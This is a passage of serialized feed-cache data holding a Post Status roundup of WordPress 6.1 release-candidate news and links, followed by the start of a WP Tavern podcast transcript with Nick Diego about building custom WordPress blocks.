Course\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=127665\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"https://poststatus.com/wordpress-6-1-rc1-devnotes-field-guides-new-learnwp-course/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:16244:\"<h2 id=\"h-this-week-at-wordpress-org-october-3-2022\">This Week at WordPress.org (October 3, 2022)</h2>\n\n\n<div class=\"has-background has-theme-palette-8-background-color wp-block-post-excerpt\"><p class=\"wp-block-post-excerpt__excerpt\"><strong>WordPress 6.1 RC 1</strong> has shipped with a release date of <strong>November 1</strong>. It\'s time to start testing! Check out the <strong>Developer Notes</strong>, <strong>Field Guide</strong>, and related team updates.  </p></div>\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<div id=\"kt-info-box_68609b-a8\" class=\"wp-block-kadence-infobox\"><div class=\"kt-blocks-info-box-link-wrap kt-blocks-info-box-media-align-left kt-info-halign-left\"><div class=\"kt-blocks-info-box-media-container\"><div class=\"kt-blocks-info-box-media kt-info-media-animate-none\"><div class=\"kadence-info-box-icon-container kt-info-icon-animate-none\"><div class=\"kadence-info-box-icon-inner-container\"><span class=\"kt-info-svg-icon kt-info-svg-icon-fas_stopwatch\"></span></div></div></div></div><div class=\"kt-infobox-textcontent\"><h2 class=\"kt-blocks-info-box-title\"><a href=\"https://make.wordpress.org/core/2022/08/10/proposal-stop-merging-experimental-apis-from-gutenberg-to-wordpress-core/\">WordPress 6.1 </a>Release Candidate 1</h2><p class=\"kt-blocks-info-box-text\"><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/23f3.png\" alt=\"⏳\" class=\"wp-smiley\" /> <a href=\"https://wordpress.org/news/2022/10/wordpress-6-1-release-candidate-1-rc1-now-available/\">WordPress 6.1 Release Candidate 1 (RC1) Now Available</a><br /><br /><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f9ea.png\" alt=\"🧪\" class=\"wp-smiley\" /> <a href=\"https://make.wordpress.org/test/2022/09/21/help-test-wordpress-6-1/\">Help Test WordPress 6.1</a><br /><br /><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f50e.png\" alt=\"🔎\" class=\"wp-smiley\" /> <a href=\"https://make.wordpress.org/core/tag/dev-notes-6-1/\">WordPress 6.1 DevNotes, Field Guides, and Team Updates</a><br /><br /><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f9d1-200d-1f393.png\" alt=\"🧑‍🎓\" class=\"wp-smiley\" /> New course on LearnWP: <a href=\"https://learn.wordpress.org/course/using-the-wordpress-data-layer/\">Using the WordPress Data Layer</a></p></div></div></div>\n\n\n\n<h2 id=\"h-news\">News</h2>\n\n\n\n<ul><li><a href=\"https://wordpress.org/news/2022/10/wordpress-6-1-release-candidate-1-rc1-now-available/\">WordPress 6.1 Release Candidate 1 (RC1) Now Available</a></li></ul>\n\n\n\n<div class=\"wp-block-kadence-spacer aligncenter kt-block-spacer-_9ee0ac-7f\"><div class=\"kt-block-spacer kt-block-spacer-halign-center\"><hr class=\"kt-divider\" /></div></div>\n\n\n\n<h2 id=\"h-wp-6-1-devnotes-and-team-updates\"><a href=\"https://make.wordpress.org/core/tag/dev-notes-6-1/\">WP 6.1 DevNotes</a> and Team Updates</h2>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/core/2022/10/12/wordpress-6-1-field-guide/\">WordPress 6.1 Field Guide</a></li><li><a href=\"https://make.wordpress.org/core/2022/10/11/performance-field-guide-for-wordpress-6-1/\">Performance Field Guide for WordPress 6.1</a></li><li><a href=\"https://make.wordpress.org/polyglots/2022/10/11/wordpress-6-1-ready-to-be-translated/\">WordPress 6.1 ready to be translated</a></li><li><a href=\"https://make.wordpress.org/core/2022/10/11/enhanced-typescript-support-in-wordpress-6-1/\">Enhanced TypeScript support in WordPress 6.1</a></li><li><a href=\"https://make.wordpress.org/core/2022/10/11/reference-styles-values-in-theme-json/\">Reference Styles values in theme.json</a></li><li><a href=\"https://make.wordpress.org/core/2022/10/11/wordpress-6-1-accessibility-improvements/\">WordPress 6.1 Accessibility Improvements</a></li><li><a href=\"https://make.wordpress.org/core/2022/10/11/miscellaneous-rest-api-improvements-in-wordpress-6-1/\">Miscellaneous REST API improvements in WordPress 6.1</a></li><li><a href=\"https://make.wordpress.org/core/2022/10/12/block-api-changes-in-wordpress-6-1/\">Block API changes in WordPress 6.1</a></li><li><a href=\"https://make.wordpress.org/core/2022/10/11/content-locking-features-and-updates/\">Content locking features and updates</a></li><li><a href=\"https://make.wordpress.org/core/2022/10/11/simplified-data-access-with-new-react-hooks-in-wordpress-6-1/\">Simplified data access with new React hooks in WordPress 6.1</a></li><li><a href=\"https://make.wordpress.org/core/2022/10/09/introducing-wp_list_tableget_views_links-in-wordpress-6-1/\">Introducing WP_List_Table::get_views_links() in WordPress 6.1</a></li><li><a href=\"https://make.wordpress.org/core/2022/10/08/escaping-table-and-field-names-with-wpdbprepare-in-wordpress-6-1/\">Escaping Table and Field names with wpdb::prepare() in WordPress 6.1</a></li><li><a href=\"https://make.wordpress.org/core/2022/10/07/create-block-scaffolding-tool-updates/\">Create-block scaffolding tool updates</a></li><li><a href=\"https://make.wordpress.org/core/2022/10/07/introduction-of-presets-across-padding-margin-and-block-gap/\">Introduction of presets across padding, margin and block gap</a></li><li><a href=\"https://make.wordpress.org/core/2022/10/07/improved-php-performance-for-core-blocks-registration/\">Improved PHP performance for core blocks registration</a></li><li><a href=\"https://make.wordpress.org/core/2022/10/06/introducing-update-uri-theme-header-in-wordpress-6-1/\">Introducing “Update URI” theme header in WordPress&nbsp;6.1</a></li><li><a href=\"https://make.wordpress.org/core/2022/10/04/block-based-template-parts-in-traditional-themes/\">Block-based “template parts” in traditional themes</a></li><li><a href=\"https://make.wordpress.org/core/2022/10/07/improvements-to-wp_query-performance-in-6-1/\">Improvements to WP_Query performance in 6.1</a></li><li><a href=\"https://make.wordpress.org/core/2022/10/06/new-cache-site-health-checks-in-wordpress-6-1/\">New cache Site Health checks in WordPress 6.1</a></li><li><a href=\"https://make.wordpress.org/core/2022/09/27/navigation-block-fallback-behavior-in-wp-6-1-dev-note/\">Navigation Block Fallback Behavior in WP 6.1</a></li></ul>\n\n\n\n<div class=\"wp-block-kadence-spacer aligncenter kt-block-spacer-_121b9e-cb\"><div class=\"kt-block-spacer kt-block-spacer-halign-center\"><hr class=\"kt-divider\" /></div></div>\n\n\n\n<div class=\"wp-container-27 wp-block-columns\">\n<div class=\"wp-container-25 wp-block-column\">\n<h2 id=\"h-accessibility\"><a href=\"https://make.wordpress.org/accessibility\">Accessibility</a></h2>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/accessibility/2022/10/09/accessibility-team-meeting-notes-october-7-2022/\">Accessibility Team Meeting Notes: October 7, 2022</a></li></ul>\n\n\n\n<h2 id=\"h-cli\"><a href=\"https://make.wordpress.org/cli\">CLI</a></h2>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/cli/2022/10/11/wp-cli-v2-7-0-release-notes/\">WP-CLI v2.7.0 Release Notes</a></li></ul>\n\n\n\n<h2 id=\"h-community\">Community</h2>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/community/2022/09/27/15-oct-survey-deadline/\">By 15 October – Please complete the Annual Meetup Survey and share it widely!</a></li><li><a href=\"https://make.wordpress.org/community/2022/10/07/upcoming-wpdiversity-events-october-2022/\">Upcoming #WPDiversity Events: October 2022</a></li><li><a href=\"https://make.wordpress.org/community/2022/10/06/idea-freescout-for-wordcamp-organising-teams/\">Idea: Freescout for WordCamp organising teams</a></li><li><a href=\"https://make.wordpress.org/community/2022/10/06/recap-of-apac-wpdiversity-network-building-10th-meeting-sept-29-2022/\">Recap of APAC WPDiversity Network Building – 10th meeting (Sept 29, 2022)</a></li></ul>\n\n\n\n<h2 id=\"h-core\"><a href=\"https://make.wordpress.org/core\">Core</a> </h2>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/core/2022/10/03/a-week-in-core-october-4-2022/\">A Week in Core – October 3, 2022</a></li><li><a href=\"https://make.wordpress.org/core/2022/09/30/whats-new-in-gutenberg-14-2-28-september/\">What’s new in Gutenberg 14.2? (28 September)</a></li></ul>\n\n\n\n<h3 id=\"h-meetings\">Meetings</h3>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/core/2022/10/11/dev-chat-agenda-october-12-2022/\">Dev Chat agenda, October 12, 2022</a></li></ul>\n\n\n\n<h2 id=\"h-design\"><a href=\"https://make.wordpress.org/design\">Design</a></h2>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/design/2022/10/10/design-share-sep-26-oct-7/\">Design Share: Sep 26–Oct&nbsp;7</a></li></ul>\n\n\n\n<h2 id=\"h-documentation\"><a href=\"https://make.wordpress.org/docs\">Documentation</a></h2>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/docs/2022/10/11/summary-of-docs-team-meeting-october-11-2022/\">Summary of Docs Team Meeting October 11, 2022</a></li><li><a href=\"https://make.wordpress.org/updates/2022/10/11/documentation-team-update-october-11-2022/\">Documentation Team Update – October 11, 2022</a></li></ul>\n\n\n\n<h2 id=\"h-marketing\"><a href=\"https://make.wordpress.org/marketing\">Marketing</a></h2>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/marketing/2022/10/11/agenda-wordpress-global-marketing-team-meeting-october-12-2022/\">Agenda: WordPress global marketing team meeting, October 12, 2022</a></li></ul>\n\n\n\n<h2 id=\"h-meta\"><a href=\"https://make.wordpress.org/meta\">Meta</a></h2>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/meta/2022/10/11/renaming-wordpress-org-support-to-documentation/\">Renaming WordPress.org Support to Documentation</a></li><li><a href=\"https://meta.trac.wordpress.org/ticket/6511\">Bring back the active install growth chart</a></li></ul>\n\n\n\n<h2 id=\"h-mobile\"><a href=\"https://make.wordpress.org/mobile\">Mobile</a></h2>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/mobile/2022/10/04/call-for-testing-wordpress-for-android-20-9/\">Call for Testing: WordPress for Android 20.9</a></li><li><a href=\"https://make.wordpress.org/mobile/2022/10/04/call-for-testing-wordpress-for-ios-20-9/\">Call for Testing: WordPress for iOS 20.9</a></li></ul>\n\n\n\n<h2 id=\"h-openverse\"><a href=\"https://make.wordpress.org/openverse\">Openverse</a></h2>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/openverse/2022/10/10/next-steps-for-thingiverse-data/\">Next steps for Thingiverse data</a></li></ul>\n</div>\n\n\n\n<div class=\"wp-container-26 wp-block-column\">\n<h2 id=\"h-performance\"><a href=\"https://make.wordpress.org/performance/\">Performance</a></h2>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/core/2022/10/11/performance-team-meeting-summary-11-october-2022/\">Performance team meeting summary 11 October 2022</a></li></ul>\n\n\n\n<h2 id=\"h-polyglots\">Polyglots</h2>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/polyglots/2022/10/12/agenda-weekly-polyglots-chat-october-12-2022-1300-utc-category-weekly-chat/\">Agenda: Weekly Polyglots Chat – October 12, 2022 (13:00 UTC) Category: Weekly chat</a></li><li><a href=\"https://make.wordpress.org/polyglots/2022/10/11/wordpress-6-1-ready-to-be-translated/\">WordPress 6.1 ready to be translated</a></li></ul>\n\n\n\n<h2 id=\"h-plugins\"><a href=\"https://make.wordpress.org/plugins\">Plugins</a></h2>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/plugins/2022/10/11/reminder-about-final-notices/\">Reminder about Final Notices</a></li></ul>\n\n\n\n<h2 id=\"h-test\"><a href=\"https://make.wordpress.org/test\">Test</a></h2>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/updates/2022/10/10/test-team-update-10-october-2022/\">Test Team Update: 10 October 2022</a></li></ul>\n\n\n\n<h2 id=\"h-themes\"><a href=\"https://make.wordpress.org/themes\">Themes</a></h2>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/themes/2022/09/28/themes-team-meeting-notes-september-27-2022/\"></a><a href=\"https://make.wordpress.org/themes/2022/10/11/themes-team-meeting-notes-october-11-2022/\">Themes Team Meeting Notes –&nbsp;October 11, 2022</a></li><li><a href=\"https://make.wordpress.org/updates/2022/10/04/themes-team-update-october-04-2022/\"></a><a href=\"https://make.wordpress.org/updates/2022/10/11/themes-team-update-october-11-2022/\">Themes team update October 11, 2022</a></li></ul>\n\n\n\n<h2 id=\"h-training\"><a href=\"https://make.wordpress.org/training\">Training</a></h2>\n\n\n\n<ul><li><a href=\"https://learn.wordpress.org/individual-learner-survey/\">How did you learn WordPress?</a></li><li><a href=\"https://make.wordpress.org/training/2022/10/10/meeting-agenda-for-october-11-2022/\">Meeting Agenda for October 11, 2022</a></li><li><a href=\"https://make.wordpress.org/training/2022/10/07/ux-feedback/\">UX Feedback</a></li><li><a href=\"https://make.wordpress.org/training/2022/10/06/training-team-meeting-recap-for-october-4-2022/\">Training Team Meeting Recap for October 4, 2022</a></li></ul>\n\n\n\n<h3 id=\"h-lesson-plans\">Lesson Plans</h3>\n\n\n\n<ul><li><a href=\"https://learn.wordpress.org/lesson-plan/imposta-una-pagina-statica-come-homepage/\">Imposta una pagina statica come homepage</a></li></ul>\n\n\n\n<h3 id=\"h-tutorials\">Tutorials</h3>\n\n\n\n<ul><li><a href=\"https://learn.wordpress.org/tutorial/adding-a-pattern-from-the-pattern-directory-to-your-theme/\">Adding a Pattern From the Pattern Directory to Your&nbsp;Theme</a></li></ul>\n\n\n\n<h3 id=\"h-online-workshops\">Online Workshops</h3>\n\n\n\n<ul><li><a href=\"https://learn.wordpress.org/?meeting=lets-code-creating-custom-templates-and-template-parts\">Let’s code! Creating Custom Templates and Template Parts</a></li></ul>\n\n\n\n<h3 id=\"h-courses\">Courses</h3>\n\n\n\n<ul><li><a href=\"https://learn.wordpress.org/course/using-the-wordpress-data-layer/\">Using the WordPress Data Layer</a></li></ul>\n\n\n\n<h2 id=\"h-wptv\">WPTV</h2>\n\n\n\n<ul><li><a href=\"https://wordpress.tv/category/year/2022/\">Latest WordPress TV videos</a></li></ul>\n</div>\n</div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<h2 id=\"h-related-news\">Related News:</h2>\n\n\n\n<ul><li><a href=\"https://tc39.es/#proposals\">ECMAScript Proposals</a></li></ul>\n\n\n\n<p class=\"has-theme-palette-7-background-color has-background\">Thanks for reading our WP dot .org roundup! Each week we are highlighting the news and discussions coming from the good folks making WordPress possible. If you or your company create products or services that use WordPress, you need to be engaged with them and their work. Be sure to share this resource with your product and project managers. <br /><br /><strong>Are you interested in giving back and contributing your time and skills to WordPress.org?</strong> <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f64f.png\" alt=\"🙏\" class=\"wp-smiley\" /> <a href=\"https://wordpress.org/support/article/contributing-to-wordpress/\">Start Here ›</a><br /><br /><strong>Get our weekly WordPress community news digest</strong> — Post Status\' <a href=\"https://poststatus.com/news/week-in-review/\">Week in Review</a> — covering the WP/Woo news plus significant writing and podcasts. It\'s also available in <a href=\"https://poststatus.com/newsletter\">our newsletter</a>. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f48c.png\" alt=\"💌\" class=\"wp-smiley\" /></p>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<div class=\"wp-block-media-text alignwide is-stacked-on-mobile has-background\"><a href=\"https://poststatus.com/\"><img src=\"https://cdn.poststatus.com/wp-content/uploads/2021/09/vertical-post-status-logo-250.png\" alt=\"Post Status\" class=\"wp-image-85823 size-full\" /></a><div class=\"wp-block-media-text__content\">\n<p class=\"has-text-align-left has-normal-font-size\" id=\"h-get-ready-for-remote-work\">You — and <a href=\"https://poststatus.com/business-membership/\">your whole team</a> can <a href=\"https://poststatus.com/post-status-membership-club/\">Join Post Status</a> too!</p>\n\n\n\n<p class=\"has-text-align-left has-small-font-size\"><strong>Build your network. Learn with others. Find your next job — or your next hire.</strong> Read the <strong>Post Status</strong> <a href=\"https://poststatus.com/newsletter/\">newsletter</a>. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/2709.png\" alt=\"✉\" class=\"wp-smiley\" /> Listen to <a href=\"https://poststatus.com/podcasts/\">podcasts</a>. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f399.png\" alt=\"🎙\" class=\"wp-smiley\" /> Follow <a href=\"https://twitter.com/post_status/\">@Post_Status</a>. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f426.png\" alt=\"🐦\" class=\"wp-smiley\" /></p>\n</div></div>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n<p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 12 Oct 2022 17:37:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Courtney Robertson\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:33;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"WPTavern: #46 – Nick Diego on Why You Should Be Excited About the Possibilities of WordPress Blocks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wptavern.com/?post_type=podcast&p=138504\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:115:\"https://wptavern.com/podcast/46-nick-diego-on-why-you-should-be-excited-about-the-possibilities-of-wordpress-blocks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:42402:\"Transcript<div>\n<p>[00:00:00] <strong>Nathan Wrigley:</strong> Welcome to the Jukebox podcast from WP Tavern. My name is Nathan Wrigley.</p>\n\n\n\n<p>Jukebox is a podcast which is dedicated to all things WordPress. The people, the events, the plugins, the themes, and in this case, why you should be excited about WordPress blocks.</p>\n\n\n\n<p>If you&#8217;d like to subscribe to the podcast, you can do that by searching for WP Tavern in your podcast player of choice, or go to WPTavern.com forward slash feed forward slash podcast. And you can copy that URL into most podcast players.</p>\n\n\n\n<p>If you have a topic that you&#8217;d like us to feature on the podcast, I&#8217;m keen to hear from you and hopefully get you, or your idea featured on the show. You can do that by heading over to WPTavern.com forward slash contact forward slash jukebox, and use the contact form there.</p>\n\n\n\n<p>So on the podcast today, we have Nick Diego. Nick is a Developer Advocate at WP Engine. He can be found, creating educational content, building plugins and themes, and contributing to WordPress core.</p>\n\n\n\n<p>He&#8217;s on the podcast today to talk about his passion and optimism for the future of WordPress using blocks. At the recent WordCamp US, Nick gave a presentation entitled, &#8216;Let&#8217;s build a custom block in 15 minutes&#8217;. It was his attempt at showing a group of WordPress enthusiasts that the barrier to creating blocks is slowly being eroded, due to the creation of new tools. These tools are creating opportunities for people who might otherwise have stayed away from block development.</p>\n\n\n\n<p>It&#8217;s becoming easier to create the blocks as the tools take away much of the technical burden of getting you up and running without advanced knowledge of JavaScript and React. Coupled with core components, native blocks supports, and a bit of guidance, Nick thinks that every WordPress developer can add custom blocks to their repertoire.</p>\n\n\n\n<p>It&#8217;s clear that Nick is all in on blocks. And during the podcast, he makes the case for why you should be too. They offer so many opportunities for what can be displayed on a page, and their capabilities are only getting better.</p>\n\n\n\n<p>We talk about how WordPress core blocks are trying to support developers by adding components and blocks supports so you don&#8217;t have to repeat the development work already done by others. You can build on top of previous work and thereby save yourself valuable time.</p>\n\n\n\n<p>It&#8217;s a fascinating chat, especially for those who are, as yet, undecided about whether they want to embrace WordPress blocks.</p>\n\n\n\n<p>Typically when we record the podcast, there&#8217;s not a lot of background noise, but that&#8217;s not always the case. Over the coming weeks, I&#8217;ll be bringing you recordings from a recent trip to WordCamp US 2022, and you might notice that the recordings have a little echo or other strange audio artifacts. Whilst the podcasts are more than listenable, I hope that you understand that the vagaries of the real world were at play.</p>\n\n\n\n<p>If you&#8217;re interested in finding out more, you can find all the links in the show notes by heading over to WPTavern.com forward slash podcast. Where you&#8217;ll find all of the other episodes as well. And so without further delay, I bring you Nick Diego.</p>\n\n\n\n<p>I am joined on the podcast by Nick Diego. How you doing, Nick?</p>\n\n\n\n<p>[00:04:03] <strong>Nick Deigo:</strong> I&#8217;m doing great.</p>\n\n\n\n<p>[00:04:03] <strong>Nathan Wrigley:</strong> Would you just introduce yourself? Give us a little bit of your background, who you work for. How come you&#8217;re at WordCamp US.</p>\n\n\n\n<p>[00:04:08] <strong>Nick Deigo:</strong> I&#8217;m a developer advocate at WP Engine. I also do a lot of contributing both on the WordPress core team and also on the training team for WordPress.</p>\n\n\n\n<p>[00:04:16] <strong>Nathan Wrigley:</strong> He&#8217;s doing a talk, presentation. What&#8217;s it all about Nick?</p>\n\n\n\n<p>[00:04:19] <strong>Nick Deigo:</strong> It&#8217;s all about trying to get people excited about building their own custom blocks, and I attempted to build a custom block completely in fifteen minutes.</p>\n\n\n\n<p>[00:04:27] <strong>Nathan Wrigley:</strong> Did you achieve it?</p>\n\n\n\n<p>[00:04:29] <strong>Nick Deigo:</strong> Just barely. I got the zero minute sign as I was just finishing the presentation, so I just got under the wire.</p>\n\n\n\n<p>[00:04:35] <strong>Nathan Wrigley:</strong> I guess the principle therefore, is that if you can do something in 15 minutes, I mean, let&#8217;s be honest, you&#8217;re pretty well versed, probably had a few runs through of that. But the bit that you are trying to educate people in, is that it&#8217;s easier now than it ever has been. So there&#8217;s no excuse to not explore. Is that basically it?</p>\n\n\n\n<p>[00:04:50] <strong>Nick Deigo:</strong> Yeah, and I think building blocks has been a bit scary. I know it was scary for myself. I didn&#8217;t come from a JavaScript background, mainly PHP. And so I wanted to show people that there&#8217;s so many more tools nowadays that it&#8217;s not as scary to get started, and if I can do it in 15 minutes, and I came from a non-technical background. You can do it too.</p>\n\n\n\n<p>[00:05:09] <strong>Nathan Wrigley:</strong> When blocks came around, Gutenberg was launched the first time, how did we build blocks and how has that changed? What things have come over the horizon since then to make it easier?</p>\n\n\n\n<p>[00:05:19] <strong>Nick Deigo:</strong> You wandered in the wilderness and looked for some documentation that maybe didn&#8217;t exist, and maybe looked at some core blocks and you kind of tried to figure it out. But today you can scaffold an entire block with one line of code in your terminal and voila, you have a block.</p>\n\n\n\n<p>[00:05:34] <strong>Nathan Wrigley:</strong> Is that because it&#8217;s become easier to do, or is that just that there&#8217;s more documentation? Are there actual tools? Are there pieces of software that you can download and use and things to make it more straightforward?</p>\n\n\n\n<p>[00:05:46] <strong>Nick Deigo:</strong> I find building with JavaScript is just inherently more challenging than PHP, but we have tools today written by contributors to WordPress that allow you to take all the hard bits and it takes care of that for you. And you can actually get to building the block itself and not worry about compiling JavaScript files and compiling style sheets. It&#8217;s all kind of done for you, which really makes it a lot easier.</p>\n\n\n\n<p>[00:06:08] <strong>Nathan Wrigley:</strong> And when you say done for you, is that literally done for you? There&#8217;s no caveats. You just do the workflow that you&#8217;ve just described and you&#8217;re off to the races.</p>\n\n\n\n<p>[00:06:15] <strong>Nick Deigo:</strong> It does it all for you. It scaffolds the whole thing. And now there&#8217;s a new version that came out actually like last week that allows you to choose different types of blocks you want to build and it will scaffold that for you and you can get started there, so.</p>\n\n\n\n<p>[00:06:29] <strong>Nathan Wrigley:</strong> I&#8217;ll put the link, which you may mention in a moment in the show notes, but where do we find these tools? Where are we going to be going to? Are there websites that you can mention?</p>\n\n\n\n<p>[00:06:37] <strong>Nick Deigo:</strong> So the biggest tool right now is called Create Block, kind of on the nose, but it&#8217;s maintained by the WordPress core contributing community. And it&#8217;s, well, it&#8217;ll be in the show notes, but it&#8217;s just Crate Block, WordPress in Google and you&#8217;ll find it. The documentation&#8217;s being built out. I gotta shout out Ryan Walter, a Developer Advocate at Automattic. He&#8217;s done a lot of work on the Create Block tool, and a lot of the documentation around it. So, that&#8217;s a place to start if you want to use that tool.</p>\n\n\n\n<p>[00:07:00] <strong>Nathan Wrigley:</strong> Okay, and does it allow us to do all the things? Does the tool allow us to do a subset of things? In other words, if you are really thick in the weeds and you understand how to do React and all of that, are there limitations or constraints that the tool will not allow you to cross over?</p>\n\n\n\n<p>[00:07:18] <strong>Nick Deigo:</strong> So, I&#8217;m a fairly novice React builder and so, and I think most people getting started with blocks would be. But if you&#8217;re a pro user, there are functionality in the tool. You could define like all your own templates. Basically, you can let it do whatever you want it to do. So if your new, it does a lot for you. And if you&#8217;re an expert you can still use it, but then, do all the wizardry that you&#8217;re used to and combine it with the tool to make your life easier.</p>\n\n\n\n<p>[00:07:47] <strong>Nathan Wrigley:</strong> So why would we want to use blocks in the first place? I don&#8217;t mean that glibly. I literally mean that, there are blocks that come installed in a vanilla version of WordPress. They achieve the majority of what most people want to publish online. What is the use case? What are the kinds of things that are useful? What kind of things can you create, that you have seen, that you have enjoyed looking at?</p>\n\n\n\n<p>[00:08:08] <strong>Nick Deigo:</strong> Assuming that you&#8217;ve bought into the block editor and that&#8217;s what you&#8217;re using and you&#8217;re not using a page builder or something like that, core blocks are great, but they&#8217;re designed to have all sorts of functionality that maybe you want or don&#8217;t want. I was actually talking to an agency earlier at Word Camp US, and they&#8217;re all in on blocks, and most of their blocks are custom because they want to provide specific functionality to their clients that maybe is a little bit different than core.</p>\n\n\n\n<p>Or maybe completely niche blocks for, I don&#8217;t know, food blogging or whatever it might be. All within a block. The block UI that interface where their clients can get in there, see it visually and add the content on their page visually. And then obviously that translates to the front end. So, tons of reasons why you&#8217;d want to make the editing experience more visual. Not only that, but allow you to control more the experience than maybe just using native core blocks.</p>\n\n\n\n<p>[00:09:04] <strong>Nathan Wrigley:</strong> So the principle being if you&#8217;ve got something, I&#8217;m going to guess this is the use case. If you&#8217;ve got something which on a particular project is something that&#8217;s going to be repeated, and in order to do that you would have to otherwise drag in a load of different blocks and sort of scaffold them together. This is the kind of use case. So something like a menu item on a restaurant menu. Or a real estate house listing item. Something like that.</p>\n\n\n\n<p>[00:09:26] <strong>Nick Deigo:</strong> Yeah, for example, I know a lot of agencies specialize. We do real estate or hospitality or whatever. You could build your own suite of blocks for your agency and then roll them out to your clients and it&#8217;s very unique. Now there&#8217;s so many third party blocks out there that you can just pull off the shelf that are fantastic, but sometimes you need something custom, and knowing how to build custom blocks I think, whether you need it or not, is a pretty valuable tool to have.</p>\n\n\n\n<p>[00:09:50] <strong>Nathan Wrigley:</strong> Just give us an idea in the 15 minutes that you had. What was the scope and magnitude of what you were able to create? I&#8217;m guessing, you know it&#8217;s not earth shattering.</p>\n\n\n\n<p>[00:09:57] <strong>Nick Deigo:</strong> It&#8217;s not. So, most people are probably familiar with the Hello Dolly plugin, by Matt Mullenweg. And so to me, when I first started developing with WordPress, Hello Dolly was like this example of, it&#8217;s one file and it did something sort of novel. Look how easy it is to extend WordPress. And so it actually started, somebody online said, can you make a block that does a random motivational quote?</p>\n\n\n\n<p>And I&#8217;m like, oh, that kind of reminds me of Hello Dolly, which has a random lyric from the song. And I&#8217;m like, what if we blockify Hello Dolly, and show just how easy it is to make a block using the original Hello Dolly plugin. That&#8217;s what I did. I made a block that spits out a random lyric from Hello Dolly on the front end of your site. We basically copy and pasted all of Matt&#8217;s original functions from Hello Dolly, dumped it into a block, and it just works.</p>\n\n\n\n<p>[00:10:46] <strong>Nathan Wrigley:</strong> So imagine that I&#8217;ve got an agency and we have never touched this before. Realistically, how easy is it for you to push your team over to this kind of methodology? Are we talking days, weeks months, possibly years?</p>\n\n\n\n<p>[00:10:59] <strong>Nick Deigo:</strong> Well, I think it depends on what you&#8217;re trying to build. So the thing that I built in the presentation was a dynamic block, where the front end&#8217;s all rendered in PHP. So if you&#8217;re really familiar with PHP and you don&#8217;t want to mess with very much JavaScript, you could create a dynamic block where you create some very simple interface in the editor, but then on the front end can do really complicated PHP stuff.</p>\n\n\n\n<p>It&#8217;s many ways like, I hate to use this term, but it&#8217;s kind of like a short code in many ways. You, you have an interface in the editor, which people play with. Not just a short code, but then on the front end, just whatever PHP you want, and that&#8217;s what basically what we built. If you&#8217;re looking to get started quickly, that&#8217;s not very challenging. I mean, using the 